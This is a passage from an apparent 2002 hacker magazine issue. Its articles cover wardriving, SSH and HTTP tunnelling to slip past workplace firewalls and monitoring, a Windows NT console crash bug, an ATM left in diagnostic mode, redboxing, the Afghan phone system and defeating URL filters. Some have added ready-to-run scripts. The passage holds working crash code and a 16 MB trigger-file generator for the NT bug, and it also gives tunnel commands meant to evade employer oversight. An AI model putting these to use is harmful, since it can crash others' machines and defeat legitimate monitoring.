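SAMPLE='SternOnTheMove;00:11:22:33:44:01;5;Y
linksys;00:11:22:33:44:02;6;N
tsunami;00:11:22:33:44:03;6;N
default;00:11:22:33:44:04;6;N
<no ssid>;00:11:22:33:44:05;11;N
WLAN;00:11:22:33:44:06;1;N
lawfirm-net;00:11:22:33:44:07;1;Y
hay14;00:11:22:33:44:08;11;N'

# Factory-default names: Linksys "linksys", Cisco Aironet "tsunami",
# Lucent/ORiNOCO "WLAN", generic "default", plus beacons with no SSID.
DEFAULT_SSIDS='linksys|default|tsunami|WLAN|<no ssid>'
AWK_INIT='BEGIN { n = split(defaults, d, "|"); for (i = 1; i <= n; i++) isdef[d[i]] = 1 }'

# wardrive_summary < listing : prints "total encrypted pct default_open"
wardrive_summary() {
  awk -F';' -v defaults="$DEFAULT_SSIDS" "$AWK_INIT"'
    NF < 4 || $1 == "SSID" { next }                 # blank or header line
    { total++ }
    $4 == "Y" { enc++ }
    ($1 in isdef) && $4 == "N" { def++ }            # open and never configured
    END {
      pct = total ? int(100 * enc / total + 0.5) : 0
      printf "%d %d %d %d\n", total, enc, pct, def
    }'
}

# list_default_open < listing : the BSSIDs worth a second look, one per line
list_default_open() {
  awk -F';' -v defaults="$DEFAULT_SSIDS" "$AWK_INIT"'
    ($1 in isdef) && $4 == "N" { print $2 "\t" $1 }'
}

# Single-value helpers over the sample, handy for scripting.
pct_encrypted() { printf '%s\n' "$SAMPLE" | wardrive_summary | cut -d' ' -f3; }
default_open_count() { printf '%s\n' "$SAMPLE" | wardrive_summary | cut -d' ' -f4; }

if [ "${1:-}" = "run" ]; then
  printf '%s\n' "$SAMPLE" | wardrive_summary
  printf '%s\n' "$SAMPLE" | list_default_open
fi
```

Run it with `sh wardrive.sh run` to see the summary line (8 2 25 5 for the sample) and the open, default-named access points. Note that "encryption enabled" here means WEP, which by 2002 was already known to be breakable from captured traffic, so the 26 percent figure is an upper bound on networks that were actually protected.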
[Figure: list of network names and BSSIDs captured at Barnes and Noble during the June 7 2600 meeting (names such as linksys, tsunami, default, WLAN, WaveLAN Network, Apple Network and many with no SSID), followed by a Kismet per-channel network count for channels 01 through 14; the listing is not legible in this copy.]
How to Break Through a Proxy or
by unformed

There are different reasons for breaking through firewalls/proxies: 1) get completely unfiltered access to the Internet; 2) get unmonitored, or secure, access to the Internet; 3) access services normally disallowed by the firewall.

This article will demonstrate various ways to get by most implementations of firewalls/proxies. In absolutely no way am I responsible if you do anything you're not supposed to (or even supposed to) be doing. If you get caught and fired, tough shit. If you access illegal information, tough shit. If you open up a hole and somebody breaks into your computer, tough shit. I'm not responsible. (This is for the lawsuit-happy bastards out there.)

Anyways, let's begin.

For all methods, it is expected that you have access to a machine on the other side of the firewall and that it has access to whatever you need. Your machine will be the client and the machine on the other side of the firewall will be the tunnel. The accessed machine will be the server.

Furthermore, this article also assumes you have a basic knowledge of your browser's configuration, installing software on your client and tunnel machines, and logging in via ssh.

A Linux/Unix box is preferable for the tunnel, but not required by any means. The software is freely available for any system.
HTTP Tunneling Through SSH
Often only some ports will be firewalled (80, 21, etc.) for caching, filtering, and monitoring purposes, while direct access is left available on other ports (25, 23, etc.). If your browser must use a proxy to access the web, but you don't require a proxy to get mail, this is probably the implementation.

If you have direct access to non-popular ports, you can access almost any service as long as you change the port. Generally, the main purpose of bypassing this firewall is to have unfiltered and/or unmonitored web access. The method can of course be modified to meet your needs.

Install a proxy server (e.g., tinyproxy) on the tunnel machine. For security purposes, set the listening port to an odd port (e.g., 8999, REMOTE_PROXY_PORT) and restrict access to localhost, so that nobody but you (arriving through ssh) can use it; a proxy that listens to the whole Internet is an open relay with your name on it. Install an ssh server (e.g., sshd) on the tunnel. For security purposes, set its listening port to an odd port too. Do not restrict sshd to localhost, because it is the one service you must reach from outside; you'll reach the proxy through ssh.

Install an ssh client on the client machine. Select a random port (LOCAL_PORT) and then set the browser's proxy to localhost:LOCAL_PORT.

Run ssh with LOCAL_PORT forwarded to the proxy on the tunnel. Because the proxy only accepts connections from localhost, the forwarding destination is localhost as seen from the tunnel, not the tunnel's public name:

ssh -L LOCAL_PORT:localhost:REMOTE_PROXY_PORT -l USERNAME REMOTE_HOST

(add -p PORT if you moved sshd off port 22). Once connected and logged in, if the proxy and the tunnel are working correctly, you've got completely unfiltered web access. (Using a SOCKS5-compliant proxy would offer an almost completely unfiltered and unmonitored connection, as long as the application supported SOCKS proxies; ssh's own -D option provides one without installing anything extra on the tunnel.)
SSH Tunneling Through HTTP
Some implementations allow only HTTP access while blocking all other ports. Check out Corkscrew at http://www.agroman.net/corkscrew/

Corkscrew is a tool to allow full SSH access through an HTTP proxy: it asks the proxy for a raw connection with the CONNECT method (the same request browsers use for HTTPS) and hands that connection to ssh as its ProxyCommand. Then through the ssh access, you can create another tunnel to allow access to all other programs.
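Both directions described above, HTTP over SSH and SSH over HTTP, collected into one script as an added example; this is not code from the article. The host names, ports and user name are placeholders to edit; the tinyproxy directives (Port, Listen, Allow, DisableViaHeader), the ssh options (-N, -L, -D, -p, -l, ProxyCommand) and corkscrew's argument order (proxyhost proxyport desthost destport) are the real ones. The check functions talk to the network and only run when asked.

```sh
#!/bin/sh
# Added example for the two sections above; not from the article.
# Placeholder values (assumptions): edit before use.
REMOTE_HOST='tunnel.example.org'       # the machine outside the firewall
REMOTE_SSH_PORT='2222'                 # sshd moved off port 22
REMOTE_PROXY_PORT='8999'               # tinyproxy on the tunnel host
LOCAL_PORT='8123'                      # what the browser points at
TUNNEL_USER='me'
HTTP_PROXY_HOST='proxy.corp.example'   # the corporate proxy, for corkscrew
HTTP_PROXY_PORT='8080'

# 1. tinyproxy.conf fragment for the tunnel host.  Binding to 127.0.0.1 and
#    allowing only 127.0.0.1 means the proxy is reachable solely through the
#    ssh forward below.  The weak form is "Listen 0.0.0.0" with no Allow
#    line, which turns the host into an open proxy for the whole Internet.
tinyproxy_conf() {
  cat <<EOF
Port $REMOTE_PROXY_PORT
Listen 127.0.0.1
Allow 127.0.0.1
DisableViaHeader Yes
EOF
}

# 2. HTTP over SSH: forward LOCAL_PORT to the proxy *as seen from the tunnel*
#    (127.0.0.1, not REMOTE_HOST, or the Allow rule rejects you).  The
#    explicit 127.0.0.1 on the local side keeps other machines on your LAN
#    from riding the tunnel; -N opens no remote shell.
http_over_ssh_cmd() {
  printf 'ssh -N -L 127.0.0.1:%s:127.0.0.1:%s -p %s -l %s %s\n' \
    "$LOCAL_PORT" "$REMOTE_PROXY_PORT" "$REMOTE_SSH_PORT" "$TUNNEL_USER" "$REMOTE_HOST"
}

# 3. SOCKS5 over SSH: ssh's built-in dynamic forward, no daemon on the tunnel.
socks_over_ssh_cmd() {
  printf 'ssh -N -D 127.0.0.1:%s -p %s -l %s %s\n' \
    "$LOCAL_PORT" "$REMOTE_SSH_PORT" "$TUNNEL_USER" "$REMOTE_HOST"
}

# 4. SSH over HTTP: ~/.ssh/config stanza that pushes the ssh session through
#    the corporate proxy's CONNECT method with corkscrew.
ssh_over_http_config() {
  cat <<EOF
Host tunnel
    HostName $REMOTE_HOST
    Port $REMOTE_SSH_PORT
    User $TUNNEL_USER
    ProxyCommand corkscrew $HTTP_PROXY_HOST $HTTP_PROXY_PORT %h %p
EOF
}

# 5. Checks (network access, run only when asked): does the forward answer,
#    and does the far end see the tunnel's address rather than yours?
#    socks5h:// makes curl resolve names on the far side too, so DNS
#    lookups do not leak to the local resolver.
proxy_check() { curl -s -x "http://127.0.0.1:$LOCAL_PORT" http://ifconfig.me/ip; }
socks_check() { curl -s --proxy "socks5h://127.0.0.1:$LOCAL_PORT" http://ifconfig.me/ip; }

case "${1:-}" in
  conf)  tinyproxy_conf ;;
  http)  http_over_ssh_cmd ;;
  socks) socks_over_ssh_cmd ;;
  cork)  ssh_over_http_config ;;
  check) proxy_check ;;
  "")    ;;   # sourced for its functions
esac
```

`sh tunnel.sh http` prints the ssh line to paste; `sh tunnel.sh conf` prints the proxy configuration for the tunnel host. The SOCKS variant is the better default for "unmonitored": with an HTTP proxy the proxy still sees every URL, whereas with -D and socks5h:// nothing on the tunnel host logs anything but ssh's own login.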
Conclusion
Hopefully this allows some of the people out there to worry a little less about getting caught doing things they're not supposed to. The reason for using ssh in both cases is because it's encrypted. In the event you are caught, at least you're only caught for breaking the rules. There's nothing additionally incriminating.

SSH can also be used for a lot more interesting things. Using Windows, you can install Cygwin, ssh into a *nix box and tunnel X connections over it, and end up working as if you were actually at the machine.

Anyways, that's my story, and I'm sticking to it.

Nasty Bug
by HJH

First off, I owe a major thanks to Zappadoodle.com. Most of what follows is just an easier to parse summary of what they've already discovered.

Despite being quite bullish on Linux, I've still considered the Windows NT line to be a worthy competitor, especially Windows 2000. From what I'd read, and the little experience I'd had, it seemed like a solid, dependable, if somewhat bloated OS.

Then I read Zappadoodle.com.

That site described an odd little bug that allowed anybody to bring that OS to its knees. The entire demo consists of a measly three lines of C code (the include and a proper main signature are added here so it compiles cleanly; the string is "Hungup", a tab, then six backspaces):

#include <stdio.h>
int main(void) {
    for (;;)
        printf("Hungup\t\b\b\b\b\b\b");   /* "Hungup", a tab, six backspaces */
}
That loop prints a string to the console, which means it passes through some code in CSRSS.EXE. The output routine that happens to parse it has a nasty flaw: it doesn't properly handle several backspace characters after a tab. Specifically, it backs up one character too many, and doesn't make sure the cursor position is still within the console buffer. By repeatedly doing this, the cursor position will eventually move outside the memory area set aside for CSRSS.EXE. By also writing normal characters, CSRSS.EXE will attempt to write there.

It won't succeed. The processor will refuse CSRSS.EXE's attempts because it doesn't have access to that bit of memory. NT will follow up by killing off CSRSS.EXE. So far, this is nothing more than poor bounds checking and standard OS procedure.
Now things get interesting. See,
CSRSS.EXE is apparently a vital part of the
NT operating system. If the kernel notices
CSRSS.EXE isn't around, a kernel panic en
sues and everything halts; no buffers are
flushed, no more network requests are han
dled, and so on. Don't ask me why Microsoft
considers console access so critical.
Depending on the version of NT, the machine may immediately reset or hang on a blue screen. That's right, this bug affects more than one version of NT. It's known to be in Windows XP, 2000, and NT 4. It may be in NT 3.5 and 3.1 as well. Basically, if you run NT, you have this bug.

I know what you're thinking: bounds checking isn't that hard to fix, and we already know where to find the relevant code, so Microsoft probably has a patch out already. Guess what? The bug has been public knowledge since late October of 2001 and as of now, no patch is available. Microsoft hasn't even admitted this bug exists.

Even worse, Microsoft is due to stop supporting NT 4 in a year or two and has already abandoned NT 3.5 and 3.1. It's unlikely those three will ever see a patch.
OK, if Microsoft isn't going to be any
help, an administrator will have to fill in.
Force anyone other than trusted admins into
a guest account. Prevent them from upload
ing and executing their own programs. From
now on, only a small set of programs are per
mitted. That should take care of it, right?
Nope.
Despite its importance to NT,
CSRSS.EXE handles all console output by
any user. Administrative privileges are
irrelevant.
And I said all console output. This means
Visual Basic programs can still down NT. As
can a Perl script. Or Python, TCL, QBASIC,
and even a few Java programs. The only ex
ceptions are programs that do more than just
spit data at the console. For instance, EDIT is
safe, but TYPE isn't.
In case you missed that, let me make it clear: you can crash NT merely by printing out a text file to a console. It sounds impossible, but I've confirmed it on a WinXP box with a 16MB text file.
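A way to produce that text file, added here as an example and not part of the original article: the function writes the exact byte sequence from the C snippet above ("Hungup", a tab, six backspaces) repeated until the file reaches the requested size, so that TYPE of the file exercises the same CSRSS path as the loop. The file name and size are placeholders; generate it only for a machine you are entitled to crash, or on the Unix side simply to inspect the bytes with od -c.

```sh
#!/bin/sh
# Added example, not from the article.  Builds a file whose bytes are the
# "Hungup" + TAB + six BS pattern repeated, sized to taste.

UNIT="$(printf 'Hungup\t\b\b\b\b\b\b')"      # 13 bytes, same as the C loop

# make_csrss_trigger FILE BYTES : write BYTES bytes of the pattern, rounded
# down to a whole number of 13-byte units so the file always ends cleanly.
make_csrss_trigger() {
  out="$1"; units=$(( $2 / 13 ))
  # awk -v passes the literal control characters through untouched.
  awk -v n="$units" -v u="$UNIT" 'BEGIN { for (i = 0; i < n; i++) printf "%s", u }' > "$out"
}

# trigger_ok FILE : sanity check that the file really carries the pattern
# (first 13 bytes equal UNIT and the length is a multiple of 13).
trigger_ok() {
  [ "$(head -c 13 "$1")" = "$UNIT" ] && [ $(( $(wc -c < "$1") % 13 )) -eq 0 ]
}

# Stand-alone: 16 MB, the size used for the XP test described above.
if [ "${1:-}" = "run" ]; then
  make_csrss_trigger "${2:-hungup.txt}" $((16 * 1024 * 1024))
fi
```

`sh hungup.sh run hungup.txt` writes the 16 MB file; `od -c hungup.txt | head` shows the `\t \b \b \b \b \b \b` run after each "Hungup", which is the only thing the console parser needs to see.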
While I could use this nasty bug to bash
Microsoft and sell Linux, I'm more con
cerned about all those vulnerable NT ma
chines. Maybe if we spread this info around
enough, we can get Microsoft to pay atten
tion and release a fix. It sure beats waiting for
a worm to exploit it, anyway.
by dufu

As I read 2600, I realize just how old I am - or maybe just how young all the new experts and pseudo-experts are. After all, my first computers were a TRS-80 Model I and a Commodore 64. Boy... programming was never so easy as back then.

Every time I get a hold of the newest 2600, I swear that I'm going to write in and comment on how everyone seems to have gotten so much smarter than me. After all, browsing MCIMail with someone else's account was a big thing back when I was a kid. Getting others' credit card numbers has actually become easier although back then, you could find a list of a hundred or more on any given BBS. 64k? Wow. That would have taken a few months of programming - even in BASIC - to fill up. Who would ever need more than that?!? Real time chatting? Some folks did it. But it was more like IRC - and I could read at 300 baud so it was easier. Networking? Hmm. Isn't that what they used mainframes for? After all, the 286's weren't even out yet. Color monitors came only in amber or green for the most part unless you had a lot of money.

I remember picking up two 12 meg hard drives at a local computer flea market for free. The largest hard drives on the market at the time were five megs and I thought we had hit the jackpot. Until I found out I couldn't get them to work on my C64.... Boy. Tossing those 40 pound monsters into the trash must have made the garbage men happy....

Then came my first IBM - a real IBM. Weight was twice as much as any clone. So was the electric bill for using it if I remember correctly. Man. It had multiple megabytes of drive space, semi-color output - although not as good as the sprite driven C64! It could go to the same BBS systems I used to visit and fit more on the screen! Wow. Too bad I couldn't read at 1200 baud. Hacking SuperWilbr - some school's remote word processing system or something. Any old-timers actually know what it was?

Someone came out with 2400 baud. Next computer flea market netted me a few 4800/9600 modems. Too bad they were nowhere near compatible with anything I used or owned. Their big blue boxes looked just like the magnetic bone healers the guy was selling in the booth next to mine. Oh, did I mention I started getting a seller's booth at the shows to make dropping off my finds easier? Yeah, I started selling junk from the last year's shows too. Helped finance my life.

Doom, Doom II, Quake, and Heretic were all on a [...] got lucky a lot, saved a lot, or used the cheat codes a lot. Regardless, I won.
Then came phone phreaking. I never really took part, but I played enough to build my own advanced Rock Box (see 19:1, page 19) without the aid of others. Loved to blast the random telemarketer who called. Seems they call much more now. I remember that 1-800-424-9096 and 9098 were the White House Press Line and the Department of Defense hotline. One still works. You play to figure out which. I memorized the touch tones so that I could tell you what number or numbers you dialed. That always freaked people out.
I'm drifting from the real purpose of this article. Let me jump back to the present time. I now work for a large accounting firm that has recently been taken down by the DOJ because of the actions of a few dozen people. Their leader has pled guilty to the charges pressed against the firm that fired him for the exact transgressions that got both of them into trouble. We've lost more people and more money than Enron even though they get most of the press. I work with technology all day, every day. Lucent digital phone systems that can be crashed by playing too much. Networks that are full of great information - all of which is now useless. Drones - aka employees running around with either W95 or W2K but nothing in-between. I even remember my first week when I performed a basic defrag on a PC and almost got fired for "hacking" because they "caught" me doing it. They have since become some of my best friends and beloved coworkers. They come to me for technical advice and guidance in many cases. I push the limits of our in-house technical support folks' knowledge base regularly enough that they have given me the direct number to their dedicated Microsoft advanced support center - along with the access code. It's even more fun to stump those guys....

I could go on and on about how Lotus Notes and eFax don't mix, W2K and our network keep me from accessing sites, etc. However, it was simply therapeutic to write this. What is the bottom line, you ask? In a few years, you'll be just like me - wondering where all the newbies learned their tricks and how they can possibly have enough free time to use them all.

Keep hacking. Keep it moral. Teach others. Become a leader of the ignorant, not their enemy.
Grab That Cache
by David Nicol

After reading all about "right-click protection" and how it is supposed to work, I thought I'd share the method I use to locate an image I have seen recently on a web page when I want to share it with someone.

Since all images are kept in Netscape's cache, it is possible to create HTML pages that refer to the images in the cache, and then work with the images you want. I do this with a small perl program something like:

#!/usr/local/bin/perl
# List every file in the Netscape cache; the trailing pipe makes open()
# read the command's output instead of a file.
open FILELIST, "find ~/.netscape/cache -type f |" or die $!;
# One scratch directory per run, named after our pid.
mkdir "pages$$", 0777
    or die "could not make directory to put the HTML pages in";
$Page = 'aa';                   # page names count aa, ab, ac, ...
while (<FILELIST>) {
    chomp;
    print "adding $_ to pages$$/$Page.html\n";
    open PAGE, ">>pages$$/$Page.html" or die $!;
    print PAGE "<img src=file:$_ height=40 width=40>\n";
    $. % 10  or print PAGE "<br>\n\n";   # ten thumbnails per row
    $. % 100 or $Page++;                 # a hundred per page, then next page
}

This gives you a bunch of HTML pages each with a hundred files from Netscape's cache on it as images. When you find the image you want, clean up with something like:

rm -rf pages17*

(the number is the pid the script ran under). Below is a window-grab of the result of running the above program on my Netscape cache.
THE END OF AN ERA
by Lucky225
lucky225@2600.com

In the beginning, Ma Bell created the operator center and the payphone. The first payphones were the old three-slot ones. When you placed a long distance call from these phones, an operator would ask for whatever the rate was for the call and when you deposited the coins you would hear bells or gongs, one bell for a nickel, two for a dime, and a gong for a quarter. This was an ineffective way of verifying how many coins were being deposited and one could easily deposit coins on a payphone next to them or ring a little bell - the earliest form of redboxing. When Ma Bell introduced the one-slot payphone it used a single frequency for identifying coins that were deposited: 2200Hz. One 66ms beep was a nickel, two 66ms beeps (66ms off) was a dime, and five 33ms beeps (33ms off) was a quarter. This was a good idea, but because it only used a single frequency, a system like ACTS could not be widespread as talk-off problems would register human voice and sound as valid coin deposits. In the late 1970s Automated Coin Toll Service (ACTS) was introduced, requiring new payphones that used DTMF coin deposit signaling, with the famous DTMF (Dual Tone Multi Frequency) 2200+1700Hz deposit tone (same timing as the single frequency 2200Hz). ACTS was supposed to be the latest and greatest thing back then, requiring fewer operators for payphone customers and automating payphone long distance calls. But it was a major step backwards for AT&T. By the early 80's phone phreaks with blue boxes that no longer worked found another way to call long distance by fooling the phone company with tones.

It's amazing that a service so susceptible to fraud has survived this long, but it is now coming to an end. On May 21, 2001 AT&T filed an application (NSD File No. W-P-D-497) with the FCC to discontinue interstate sent-paid coin service (ACTS). On October 15, 2001 by public notice (DA-01-2375) the FCC granted AT&T's request. The application reports that its earnings from the service are small and rapidly declining, and that only a small number of calls are placed from phones where the service is provided. Furthermore, they say that it costs millions of dollars to provide the service each year, an amount far greater than the revenues generated. Also, the rates are ridiculous compared to what one would pay if he or she was using a calling card or other form of payment - a minimum of $4.65 for interstate long distance calls (a $1.95 coin surcharge fee plus $2.70 for each 3 minutes). The $1.95 is a one-time fee. However, the $2.70 is the minimum you will be paying for each additional three minutes. That's 90 cents a minute, rates that were possibly driven up by red box fraud.

When you place a long distance call from ACTS payphones, you will now get the following recording: "Your call will now be completed. Please note, effective soon, this phone will no longer accept coins for AT&T long distance calls. You may wish to begin using a prepaid calling card or other payment methods as a substitute." You can hear this recording at http://amatus.austin2600.org/~lucky225/redboxatt.wav.

Once AT&T discontinues the service, that will be the end of redboxing. AT&T is the only carrier that offers sent-paid coin service. If you try to use any 101XXXX carrier, for example MCI's 10-10-222+1+NUMBER, you will still be routed to AT&T's automated system. I contacted Carmell Weathers of the FCC's Common Carrier Bureau about this to try to find out if any other carriers had offered to continue providing sent-paid coin service, and here's what he had to say:
Date: Mon, 22 Apr 2002 17:40:08 -0400
From: Carmell Weathers <cweather@fcc.gov>
To: lucky225@2600.COM
Subject: Re: AT&T Coin Sent Paid Service Discontinuation

Lucky225,
Sorry, the FCC "has not" granted AT&T's request to discontinue service.

Privileged & Confidential
I'm not sure what he meant by this as they have already granted AT&T's request by public notice. Perhaps it's still in transition and AT&T is going to be forced to continue providing the service. Doubtful though. Red boxing will soon become history though. Even with AT&T's discontinuation the local phone company does provide ACTS for intraLATA calls, but I'm sure the payphones will start being replaced with Nortel Millenniums and COCOTs in the near future. So keep your eye out and if you haven't done any experimenting with ACTS payphones, now's probably your last chance. Note however that Canada still uses single frequency 2200Hz payphones, but those are slowly being phased out too.

ATMs
by Acidus
Acidus@resnet.gatech.edu

So I was out at a mall and I needed some cash and I walked up to an ATM at Lenox Mall. It was a PNC Bank ATM, and I couldn't help but wonder why a bank from Pittsburgh had ATMs in a mall in Georgia. Anyway, something was wrong with it, and it appeared that a repairman must have been working on it because the screen showed some kind of configuration program. It looked a lot like the BIOS config screen on any PC.

The screen had something like eight options, things like change system time, change system date, change drive settings, print config, and reboot. These options were printed along the sides of the screen next to the buttons. I pushed the button next to "print config" (or something like that), and instead of taking me to a screen to configure the thermal printer, the ATM hummed for a second, and out of the receipt printer came a printout of the current configuration of the machine. Here is the printout word for word:

            PNC BANK
  ***** 01/01/07 12:19:19 *****
              SETUP
  DATE (YY/MM/DD)     07/01/01
  TIME (HH:MM:SS)     12:19:20
  FLEX DRIVE A        1.44 MB
  FLEX DRIVE B        NONE
  DRIVE 1 TYPE        127
  DRIVE 2 TYPE        NONE
  TOTAL MEMORY (KB)   16000
  COPROCESSOR         YES
Other than the "Flex" thing, this looked just like the specs of a simple computer. I didn't want to change the date or anything, and I couldn't do much at this screen. I knew I didn't have much time, and the "reboot" option looked really good. So I hit it and the machine went blank. And nothing happened. Then it whirled to life, and in the top left corner the memory counter ran: 4096, 8192, all the way up to 16000. Hello POST! Then what should my wondrous eyes see but "Phoenix BIOS Ver 4.something or other." The machine then did some kind of check on its Flex drives and then a big IBM logo came up. In the bottom of the screen it said "IBM OS/2 Version 3. Government". There was something after "Government," but the screen was smeared with something so god awful, I sure as hell wasn't going to touch it. The screen cleared and then the words "Load 40" came up, at which point the screen went to 40 columns. At this point I started attracting serious attention and decided I should go. As I left I saw the machine default into the setup program again.

I had always thought ATMs had specialized hardware and crazy stuff like that, not a PC running OS/2 of all things. The more I researched the weirder it was. ATMs are quite a complex blend of software and hardware, and a comprehensive study of them is beyond the scope of this article. However, information on ATMs and their specifics is (for obvious reasons) very hard to come by. This should clear some of the mystery up.

Hardware
The standard computer equipment available on an NCR ATM is: a Pentium processor (speeds from 100 to 166), RAM (16MB to 32MB), a 1.2 gig IDE hard drive, one 1.44MB flex drive (it's just a floppy), a 10 inch VGA color or monochrome monitor (notice VGA, not SVGA, so it's only doing 640x480 in 16 colors or 320x200 in 256), and an RS-232 port. Optional parts include a sound card (to play digitized speech), an IDE CDROM to store the speech (speeds range from 6x to 24x), a second Flex drive, and other banking specific hardware (a better thermal printer for receipts, currency cassettes, etc.).

I found the RS-232 interface a great thing to hack. It is there to allow remote video card systems to be controlled by the ATM. However, this is a rarely used option. RS-232 is extremely well documented but sadly slow. On the other hand, ATMs have really weird connectivity. The NCR ATMs I researched (Personas and 5xxx series) didn't support TCP/IP. They had weird protocols like NCR/ISO Async, IBM 3275 Bisync, and a lot of other very obscure stuff. RS-232 is the only guaranteed way to move lots of data on and off the system.

There is a lot of banking specific hardware in these things. I don't want to fill this article with specs of currency cassettes or mag card canisters. If you are interested, check my references. The only thing of interest is a DES hardware encryption system.
Software
The operating system running on the ATMs is OS/2 Version 3. (I have since seen versions of OS/2 Warp for sale for ATMs as well.) I know next to nothing about OS/2, so study on your own if you want. I do know however that OS/2 is used for its multitasking abilities.

The main NCR program running is something called the Self Service System Software (S4). This keeps a log on the hard drive of "all significant customer and supervisor activity." It also manages all the applications such as the communications software and the graphical display. S4 has an API programmers can use called ADI. ADI handles things like memory allocation and access to the file system. However, programmers can call OS/2's API directly. These machines use FAT as their file system and, since it's IBM, it is most likely still FAT16. Other software running on these ATMs is NCR Direct Connect, which seems to be the interface to the communications. (It handles the protocols, and can convert between them or emulate other ATMs.)

The software running on the ATMs could be pretty old. I mean, the diagnostics asked if I had a coprocessor to enable. Math coprocessors have been built into the processor since the 486DX (a 386DX still needed a separate 387). Also, NCR offers a book for Pascal programmers to develop applications for the ATM.

ATM software is developed on standard PCs, and since they use Intel x86 Pentium class processors and OS/2 (which runs DOS and Windows 3.x programs in its compatibility sessions), anything that doesn't use Windows API calls should work. In fact, a lot of Windows 3.x programs work in OS/2. A good rule of thumb: if it works in DOS, it will work in OS/2.
Communication
Communication in the ATM is conducted
through leased lines, though some ATMs in less
high traffic areas may still use dial-up. By Fed
eral law all information traveling on these lines
must be encrypted. The NCR ATMs uses DES.
Alarms
Alarms on the ATM mainly protect against a
physical attack. These are the mechanical and
thermal alarms, and they make sure you don't
take a crowbar or a blowtorch to the money
door. However, NCR does have an enhanced
alarm system which protects the Flex disk drive
door. This enhanced version also has seismic
sensors. However, unplugging the ATM or re
booting it a lot shouldn't mess anything up.
Conclusions
There is a lot more i nfo about ATMs and you
can check my references. I have no desire to try
and steal money from them so I never really
looked at the data lines or ways to intercept key
presses inside the machine. However, my re
search shows that the computer part of the
ATM, since it uses standard PC parts, is vulner
able. I rcbooted it for god's sake. I wish I knew
the OS/2 equivalent of [F5] which would have
let me interrupt the boot and get to a command
prompt. The machines most hackable are in
malls and other public places. These have much
less armor plating and other countermeasures
and instead rely on their exposure to protect
them. If you look like you know what you are
doing, no one will question you.. Who would
like to put anti-virus software on an ATM? With
a little research about OS/2 and how it loads,
you could easily drop out of the boot-up and get
to a command prompt. Using the floppy and the
RS-232 port (or better yet a CDROM if it's
there), you could install your own software.
How cool would it be to have an ATM running
Doom?
References
NCR PersonaS 88 ATM System Description
- Got the bulk of my info from this. Found it af
ter a ton of searching on a cached Google page
of NCR's Russian web site. I don't think they
wanted this out in the public, but I got it and
moved it to my site: http://www.prism.gat
ech.edu/-gtc344p/NCR-ATM.pdf
The Bankers Exchange - They sell ATM
parts and accessories. Used them to check on
parts: http://www.bankersx.comlhome.html
The idiots at Lenox - for leaving the ATM in
diagnostic mode.
The Afghan Phone System
by Iconoclast
phosgene@setec.org
If you are a curious phreak like me, the telecommunications infrastructure of Afghanistan immediately comes to mind as something that deserves exploration and understanding. Alas, the lack of said infrastructure leads me to say that it is quite possibly the worst place to try to make a phone call from on the entire planet.
We take our precious lovely dialtone for granted, but there you will be hard-pressed to even find a working telephone. To begin with, let's take a look at the numbering formats for the country. Country codes are assigned by the International Telecommunication Union (ITU) (www.itu.int). The International Country Code (ICC) for Afghanistan is 93. The "9" signifies it is in geographical region 9 of the world. The United States has an ICC of 1.
From within Afghanistan, to place an international call you would dial the International Direct Dial (IDD) code which is 00. To place a call within the country you would prefix it with the National Direct Dial (NDD) code which is simply 0. There are no city codes or area codes in the country on the old electromechanical exchanges. Numbers within the various cities are five digits long. An excellent directory of people to call in Afghanistan was listed by the Afghan Wireless Communications Company (AWCC) but was recently removed. Hopefully, they will restore this information (www.afghanwireless.com/search.cfm).
Telephone usage is actually dropping, since in 1996 there were 29,000 lines available and in 1998 there were only 21,000 lines. Of course, Taliban bans on Internet use didn't exactly spur telecom growth. My sources in the CIA have stated that "in 1997, telecommunications links were established between Mazar-e Sharif, Herat, Kandahar, Jalalabad, and Kabul through satellite and microwave systems" (www.cia.gov/cia/publications/factbook/index.html).
Two telecommunications companies from China, Zhongxing Telecom and Huawei Technologies, were attempting to install a switching network in the capital city of Kabul which could handle 130,000 lines. The status of this project is unknown at the current time.
Most of the existing exchanges are based on electromechanical switches that are 40 years old. These old exchanges are using Siemens Strowger switches. Completing calls on these exchanges is very difficult. New equipment using digital switches is being installed. In order to place calls to the older switches, one must have the operator service in Kabul complete the call. You can reach the operator service by dialing +93-2-290090. Then give them a five digit phone number and the call may have a slight chance of being completed.
Parts of the country have digital exchanges which can be dialed directly without the operator. The various city codes are: 02 Kabul, 03 Kandahar, 04 Herat, 05 Mazar-i-Sherif, 06 Kunduz, 07 Jalalabad, and 08 AWCC Mobile Telephone Network.
Regarding international telecommunications links, this is primarily done through satellite communications. A company called Telephone Systems International S.A. (www.telsysint.com) provides international connectivity. According to Afghan Wireless, there are satellite earth stations - one Intelsat (Indian Ocean) linked only to Iran and one Intersputnik (Atlantic Ocean region), as well as a commercial satellite telephone center in Ghazni.
This New York City based company unveiled a brand new GSM phone network in Afghanistan in May, 2002. Chairman Hamid Karzai was the first person to place a telephone call over it. This has actually been the fastest GSM installation in a developing country.
There are two different kinds of phone cards planned for sale. One is called a "Fixed Line Phone Card," the other is a "Mobile Top Up." To use the Fixed Line Phone Card, one would dial 81 from within the country, listen to the instructions, and then enter the PIN as printed on the back of the card. The destination party number is then dialed. If a mistake in dialing is made or one wants to make an additional call, then "##" is entered followed by the number. The Mobile Top Up card adds funds to a GSM account. The number 1V1 is dialed from within the country, the PIN is entered as printed on the back of the card, and the account is automatically credited.

Of course, by now you want to "reach out and touch" someone in Afghanistan. Why not give Bin Laden a call on his INMARSAT satellite phone? He has not been picking up lately (wonder why?!). Bin Laden: +873-682-505-331. Have phun!
Yet Another Way to Defeat URL Filters
by ThermoFish (JW)
In 17:3, the article entitled "Another Way to Defeat URL Filters" by ASM_dood put it up to readers to come up with a script to turn IP addresses into their decimal equivalent. At the end of the article a script by CSS was put in which did just that. While that script works great, most people know the hostname (URL) of the site they want to go to. Who wants to have to go get the IP address of the hostname they want to go to? Instead of the two step process of getting the IP address of the hostname and then turning that IP into a decimal, I would rather just type in a hostname and get its decimal equivalent in one step. Therefore, I wrote some code to accomplish that.

This code was written in VC++ and you need to include the WSOCK32.LIB library in the workspace for it to link properly. I left the IP to Decimal function separate to show how that is done more clearly. The retrieval of the IP from the hostname is done with the HOSTENT structure and gethostbyname() function.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <iostream>
#include <winsock.h>
#include <conio.h>

int IPtoDec(char *ip);

int main()
{
    using namespace std;
    WSAData wData;

    // WSAStartup returns 0 on success and an error code otherwise; it never
    // returns SOCKET_ERROR, so the check has to be against zero.
    if (WSAStartup(MAKEWORD(2, 2), &wData) != 0)
    {
        cout << "Winsock init error\n";
        cout << "\n\nPress any key to exit.\n";
        getch();
        return 1;
